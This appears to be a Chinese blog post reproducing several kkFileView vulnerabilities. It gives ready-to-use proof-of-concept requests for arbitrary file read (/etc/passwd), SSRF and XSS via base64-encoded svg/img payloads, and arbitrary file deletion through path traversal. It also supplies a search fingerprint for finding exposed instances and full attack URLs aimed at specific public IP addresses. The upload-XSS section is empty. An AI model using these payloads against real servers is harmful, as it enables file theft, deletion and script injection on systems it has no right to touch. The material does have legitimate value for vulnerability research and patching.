Keking KkFileview是中国凯京科技（Keking）公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞，该漏洞源于存在通过目录遍历漏洞读取任意文件，可能导致相关主机上的敏感文件泄漏。

kkFileview <=3.6.0

body="kkFile：View"

 http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

0x01 kkFileView SSR 漏洞

kkFileview v4.1.0存在SSRF漏洞，攻击者可以利用此漏洞造成服务器端请求伪造（SSRF），远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。

kkFileview =v4.1.0

/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D  

 

 

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

 

<svg/onload=alert(1)>编码base64:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+

url编码：

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

poc2:

http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

kkFileview全版本存在文件解析漏洞，攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF，远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求

kkFileView=4.1.0

1、上传文件

 

 

 

 

 

kkFileview v4.0.0存在任意文件删除漏洞，可能导致系统任意文件被删除

kkFileview= v4.0.0

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf（原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)

本栏目推荐文章
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 漏洞扫描以识别可能使企业面临网络威胁的安全漏洞
• 渗透测试，找出各种潜在的漏洞
• CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
• 信息安全技术-常见的安全扫描漏洞的工具、漏洞分类及处理
• Apache ActiveMQ 远程代码执行漏洞分析
• 某菠菜任意文件上传漏洞
• PHP伪协议与文件包含漏洞
• 配置Nginx解决http host头攻击漏洞 (配置Nginx终极篇。这篇文档即可解决)
• NGINX文件名漏洞(CVE-2013-4547)

kkFileView 漏洞kkfileview漏洞 kkfileview kkfileview文件 kkfileview文件docker kkfileview组件office kkfileview cloudreve系统 docker-compose kkfileview compose文件 kkfileview形式 文件html springboot kkfileview源码 解决方案 kkfileview文件docker 4.1